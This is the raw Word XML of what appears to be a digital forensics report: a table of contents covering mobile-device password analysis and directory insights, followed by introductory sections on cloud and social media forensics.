              <w:rPr>
                <w:i w:val="0"/>
                <w:smallCaps w:val="0"/>
                <w:strike w:val="0"/>
                <w:color w:val="000000"/>
                <w:u w:val="none"/>
                <w:shd w:fill="auto" w:val="clear"/>
                <w:vertAlign w:val="baseline"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">5.3.4.1. Number of Possible Password Combinations</w:t>
              <w:tab/>
              <w:t xml:space="preserve">23</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az5uqq802dem">
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:i w:val="0"/>
                <w:smallCaps w:val="0"/>
                <w:strike w:val="0"/>
                <w:color w:val="000000"/>
                <w:u w:val="none"/>
                <w:shd w:fill="auto" w:val="clear"/>
                <w:vertAlign w:val="baseline"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">5.3.4.2. Rate Limiting Mechanism</w:t>
              <w:tab/>
              <w:t xml:space="preserve">23</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xbbiz6qeyxfa">
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:i w:val="0"/>
                <w:smallCaps w:val="0"/>
                <w:strike w:val="0"/>
                <w:color w:val="000000"/>
                <w:u w:val="none"/>
                <w:shd w:fill="auto" w:val="clear"/>
                <w:vertAlign w:val="baseline"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">5.3.4.3. Time</w:t>
              <w:tab/>
              <w:t xml:space="preserve">23</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vktn9p31pfu">
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:i w:val="0"/>
                <w:smallCaps w:val="0"/>
                <w:strike w:val="0"/>
                <w:color w:val="000000"/>
                <w:u w:val="none"/>
                <w:shd w:fill="auto" w:val="clear"/>
                <w:vertAlign w:val="baseline"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">5.3.4.4. Experiment Set</w:t>
              <w:tab/>
              <w:t xml:space="preserve">24</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000048">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r08hxkf83j6m">
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:i w:val="0"/>
                <w:smallCaps w:val="0"/>
                <w:strike w:val="0"/>
                <w:color w:val="000000"/>
                <w:u w:val="none"/>
                <w:shd w:fill="auto" w:val="clear"/>
                <w:vertAlign w:val="baseline"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">5.3.5. Password Hint using the PhonePin.txt file.</w:t>
              <w:tab/>
              <w:t xml:space="preserve">24</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000049">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o563g4fhr7kn">
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:i w:val="0"/>
                <w:smallCaps w:val="0"/>
                <w:strike w:val="0"/>
                <w:color w:val="000000"/>
                <w:u w:val="none"/>
                <w:shd w:fill="auto" w:val="clear"/>
                <w:vertAlign w:val="baseline"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">5.4. Directory Insight Analysis</w:t>
              <w:tab/>
              <w:t xml:space="preserve">24</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004A">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c20lertl6zx9">
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:i w:val="0"/>
                <w:smallCaps w:val="0"/>
                <w:strike w:val="0"/>
                <w:color w:val="000000"/>
                <w:u w:val="none"/>
                <w:shd w:fill="auto" w:val="clear"/>
                <w:vertAlign w:val="baseline"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">5.4.1. Audio Transcripts</w:t>
              <w:tab/>
              <w:t xml:space="preserve">24</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004B">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5lza17hhocl4">
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:i w:val="0"/>
                <w:smallCaps w:val="0"/>
                <w:strike w:val="0"/>
                <w:color w:val="000000"/>
                <w:u w:val="none"/>
                <w:shd w:fill="auto" w:val="clear"/>
                <w:vertAlign w:val="baseline"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">5.4.2. Contacts</w:t>
              <w:tab/>
              <w:t xml:space="preserve">25</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004C">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x82zjnfg50ov">
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:i w:val="0"/>
                <w:smallCaps w:val="0"/>
                <w:strike w:val="0"/>
                <w:color w:val="000000"/>
                <w:u w:val="none"/>
                <w:shd w:fill="auto" w:val="clear"/>
                <w:vertAlign w:val="baseline"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">5.4.3. Images</w:t>
              <w:tab/>
              <w:t xml:space="preserve">25</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004D">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ew01p1hanunk">
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:i w:val="0"/>
                <w:smallCaps w:val="0"/>
                <w:strike w:val="0"/>
                <w:color w:val="000000"/>
                <w:u w:val="none"/>
                <w:shd w:fill="auto" w:val="clear"/>
                <w:vertAlign w:val="baseline"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">5.4.4. Locations</w:t>
              <w:tab/>
              <w:t xml:space="preserve">25</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004E">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ikmb5o4zdtdv">
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:i w:val="0"/>
                <w:smallCaps w:val="0"/>
                <w:strike w:val="0"/>
                <w:color w:val="000000"/>
                <w:u w:val="none"/>
                <w:shd w:fill="auto" w:val="clear"/>
                <w:vertAlign w:val="baseline"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">5.5. Conclusion</w:t>
              <w:tab/>
              <w:t xml:space="preserve">27</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004F">
          <w:pPr>
            <w:widowControl w:val="0"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="12000"/>
            </w:tabs>
            <w:spacing w:before="60" w:line="240" w:lineRule="auto"/>
            <w:ind w:left="0" w:firstLine="0"/>
            <w:rPr>
              <w:b w:val="1"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_d4sjbde65xn8">
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:i w:val="0"/>
                <w:smallCaps w:val="0"/>
                <w:strike w:val="0"/>
                <w:color w:val="000000"/>
                <w:u w:val="none"/>
                <w:shd w:fill="auto" w:val="clear"/>
                <w:vertAlign w:val="baseline"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">References</w:t>
              <w:tab/>
              <w:t xml:space="preserve">27</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000050">
          <w:pPr>
            <w:widowControl w:val="0"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="12000"/>
            </w:tabs>
            <w:spacing w:before="60" w:line="240" w:lineRule="auto"/>
            <w:ind w:left="0" w:firstLine="0"/>
            <w:rPr>
              <w:b w:val="1"/>
            </w:rPr>
          </w:pPr>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:b w:val="1"/>
              <w:rtl w:val="0"/>
            </w:rPr>
            <w:t xml:space="preserve">Annexures…………………………………………………………………………………………………………………………………………28</w:t>
          </w:r>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:p>
      </w:sdtContent>
    </w:sdt>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000051">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_v4gekwv9mhaq" w:id="10"/>
      <w:bookmarkEnd w:id="10"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Table of Figures</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numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="3"/>
              </w:numPr>
              <w:tabs>
                <w:tab w:val="right" w:leader="dot" w:pos="12000"/>
              </w:tabs>
              <w:spacing w:before="60" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:hyperlink w:anchor="_adkowze6lwua">
              <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                <w:rPr>
                  <w:rtl w:val="0"/>
                </w:rPr>
                <w:t xml:space="preserve">Figure 1: Model of Cloud [6]</w:t>
                <w:tab/>
                <w:t xml:space="preserve">6</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000053">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="3"/>
              </w:numPr>
              <w:tabs>
                <w:tab w:val="right" w:leader="dot" w:pos="12000"/>
              </w:tabs>
              <w:spacing w:before="60" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:hyperlink w:anchor="_ezps7odzv0d2">
              <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                <w:rPr>
                  <w:rtl w:val="0"/>
                </w:rPr>
                <w:t xml:space="preserve">Figure 2: Social Media and Forensics</w:t>
                <w:tab/>
                <w:t xml:space="preserve">7</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000054">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="3"/>
              </w:numPr>
              <w:tabs>
                <w:tab w:val="right" w:leader="dot" w:pos="12000"/>
              </w:tabs>
              <w:spacing w:before="60" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:u w:val="none"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Figure 3: Power ISO Tool………………………………………………………………………………………………………..15</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000055">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="3"/>
              </w:numPr>
              <w:tabs>
                <w:tab w:val="right" w:leader="dot" w:pos="12000"/>
              </w:tabs>
              <w:spacing w:before="60" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:u w:val="none"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Figure 4: Extraction Summary using Cellebrite UFED……………………………………………………………..20</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>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Heading1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_bw5sd4ktdjxp" w:id="11"/>
      <w:bookmarkEnd w:id="11"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Task 1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005B">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_ajofe0uwfv3f" w:id="12"/>
      <w:bookmarkEnd w:id="12"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Current State of the Field</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005C">
      <w:pPr>
        <w:ind w:left="1440" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Recent technological advancements have drastically altered our world, leading to a digital-dominated era. This transition, however, has been shadowed by an increase in cybercrimes and security breaches, threatening user privacy and security. As a response, digital forensics has become a pivotal field in combating these threats, marking a critical development in cybersecurity. This field specializes in extracting and analyzing information from electronic and digital devices while prioritizing the protection of user privacy. Utilizing scientific methods, digital forensics expertly documents, analyzes, preserves, and identifies digital evidence. It also reconstructs event sequences, thereby enabling the use of this evidence in legal settings [2], [3].</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005D">
      <w:pPr>
        <w:ind w:left="1440" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005E">
      <w:pPr>
        <w:ind w:left="1440" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The field is witnessing revolutionary changes with emerging trends like cloud forensics, social media forensics, IoT forensics, and USB forensics, which are redefining how digital data is analyzed for security breaches. Concurrently, as digital forensics progresses, cybercriminals are adapting by increasingly employing anti-forensics technology. These tactics, aimed at impeding forensic processes by delaying or erasing digital evidence, present new challenges to the field [5].</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005F">
      <w:pPr>
        <w:ind w:left="1440" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000060">
      <w:pPr>
        <w:ind w:left="1440" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Furthermore, digital forensics faces unique challenges due to the sophistication of cyber threats and malware, now armed with advanced anti-forensics techniques [1]. These sophisticated methods are crafted to obstruct forensic investigations, complicating the task of tracking and analyzing digital evidence.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000061">
      <w:pPr>
        <w:ind w:left="1440" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000062">
      <w:pPr>
        <w:ind w:left="1440" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Additionally, the ongoing development of malicious methodologies, tools, and software poses significant threats to both public and private networks. Cybercriminals exploit data storage systems to extract crucial information, a practice that significantly raises network security concerns [2].</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000063">
      <w:pPr>
        <w:ind w:left="1440" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000064">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000065">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_u1n5ngnsznj8" w:id="13"/>
      <w:bookmarkEnd w:id="13"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Intersection of Digital Forensics and Cybersecurity</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000066">
      <w:pPr>
        <w:ind w:left="1440" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Cybersecurity focuses on preventing digital attacks and protecting systems and data, aiming to maintain confidentiality, integrity, and availability. It's proactive, involving risk management and threat detection to defend against cyber threats. Digital Forensics, however, is reactive and investigative, dealing with examining digital devices post-incident to uncover evidence of cybercrimes. It involves collecting, analyzing, and documenting digital evidence for legal proceedings. While cybersecurity works to prevent breaches, digital forensics analyzes breaches after they occur, making both fields crucial for a comprehensive digital security strategy.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000067">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000068">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_vgn2nyi61nl5" w:id="14"/>
      <w:bookmarkEnd w:id="14"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Emerging Trends in Digital Forensics</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000069">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_3n3xrxjtjxne" w:id="15"/>
      <w:bookmarkEnd w:id="15"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Cloud Forensics</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006A">
      <w:pPr>
        <w:ind w:left="2160" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Cloud forensics, gaining attention due to cloud computing's extensive resources and wide accessibility, deals with the challenges posed by the rise in cybercrimes in cloud environments [5]. This subfield of digital forensics focuses on scientifically processing digital data in cloud settings, addressing issues related to virtualization, data duplication, and jurisdiction [6], [7]. Cloud forensics has emerged as a critical tool in addressing the security and privacy challenges posed by cloud computing. This approach focuses on utilizing the AAA (authentication, authorization, and accounting) protocol to effectively reconstruct, investigate, and analyze incidents of cloud-based cyber threats. Through cloud forensics, not only can security breaches be identified and addressed, but it also significantly contributes to the rapid recovery of cloud services following an incident, ensuring minimal disruption [8].</w:t>
        <w:br w:type="textWrapping"/>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="4500563" cy="3223961"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="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500563" cy="3223961"/>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pStyle w:val="Heading4"/>
        <w:ind w:left="2160" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_adkowze6lwua" w:id="16"/>
      <w:bookmarkEnd w:id="16"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure 1: Model of Cloud [6]</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006C">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_mrgwfmsh96d8" w:id="17"/>
      <w:bookmarkEnd w:id="17"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Social Media Forensics</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006D">
      <w:pPr>
        <w:ind w:left="2160" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The rise of Industry 4.0 and Web 2.0 technologies has increased the relevance of social media forensics in the digital forensics field due to the widespread use and vulnerability of social media platforms to cybercrimes [5], [4]. These platforms are often targeted for attacks both internally and externally, posing a risk to user data. Social media forensics has become essential for criminal investigations, offering a wealth of digital artifacts such as chat logs, images, and location data that can serve as critical evidence [9], [10]. This subfield of digital forensics utilizes advanced methods to extract, analyze, and authenticate digital evidence from social media, providing functionalities like reverse search integration and tampering localization analysis [11], [12]. As a result, social media forensics is emerging as a key trend in the digital forensics domain, enhancing the efficiency and effectiveness of investigations.</w:t>
        <w:br w:type="textWrapping"/>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="3797546" cy="2795588"/>
            <wp:effectExtent b="0" l="0" r="0" t="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3797546" cy="2795588"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
